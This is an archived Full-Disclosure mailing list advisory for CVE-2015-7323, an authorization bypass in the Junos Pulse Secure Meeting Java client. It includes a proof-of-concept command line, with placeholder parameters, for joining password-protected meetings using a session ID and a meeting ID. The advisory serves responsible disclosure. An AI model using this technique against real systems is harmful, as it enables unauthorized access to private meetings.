lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAKP=J_8+j0+qu9dtpxR0QBGEEOhkDB5-c9NEy5OHxHXpGmK-Pg@mail.gmail.com>
Date: Thu, 24 Sep 2015 15:57:32 +0200
From: Profundis Labs <profundislabs@...glemail.com>
To: fulldisclosure@...lists.org
Subject: [FD] CVE-2015-7323 - Secure Meeting (Pulse Collaboration) issue may
 allow authenticated users to bypass meeting authorization

Profundis Labs Security Advisory
https://profundis-labs.com/advisories/CVE-2015-7323.txt

Product:
================================
Junos Pulse Secure Meeting

Secure Meeting is a part of the Junos Puls Collaboration software, which
allows you to organize and holding virtual meetings with internal and
external users via the Juniper Access Gateway.

Vulnerability Type:
===================
Insufficient Authorization Checks

CVE Reference:
==============
CVE-2015-7323

VENDOR Reference:
=================
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40054

Vulnerability Details:
=====================

It is possible to enter "secure" meetings without knowledge of the password
and the invitation link using the java fat client (meetingAppSun.jar).

To access such meetings the following information is required: - A valid
sessionID (DSID). This sessionID can be obtained by either having an
invitation link to any other meeting or the user has a valid account to log
into junos pulse using the http login form. - The meeting ID The meeting ID
is a 7-8 digits number which may be gained using brute force or via
CVE-2015-7322 (https://profundis-labs.com/advisories/CVE-2015-7322.txt)

Note: The vulnerability is only related to the java fat client. If a user
tries to access a secure meeting using the web browser (
https://domain/dana-na/meeting/login_meeting.cgi?mid=PARAM_A&occurrence=0),
the meeting password (or invitation link) is required.

PoC code(s):
===============
Example how to start the java fat client to access a meeting A from the
command line:
java -classpath
/usr/lib/jvm/java-7-oracle/jre/lib/plugin.jar:~/.juniper_networks/meetingAppSun.jar
SecureMeetingApplication ivehost PARAM_D locale de log_level 1 meeting_type
0 Parameter0
"meeting_id=PARAM_A;user_name=xxx;cert_md5=PARAM_B;ncp_read_timeout=90;password=;meeting_url=;mobile_meeting_url="
uploadlog 1 home_dir "/home/..." user_agent "Mozilla/5.0" neoteris-dsid
"DSID=PARAM_C"

PARAM_A = meeting ID of Meeting A
PARAM_B = md5 hash of the SSL-certifificate of Junos Pulse server
PARAM_C = a valid sessionID
PARAM_D = the domain/IP of the Junos Pulse server

Disclosure Timeline:
=========================================================

Vendor Notification:  01/2015
Vendor Confirmation:  03/2015
Vendor Patch Release: 06/2015
Public Disclosure:    09/2015

Affected Version:
=========================================================
8.0.5

Exploitation Technique:
=======================
Remote

Severity Level:
=========================================================
CVSS Score: 5.0 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ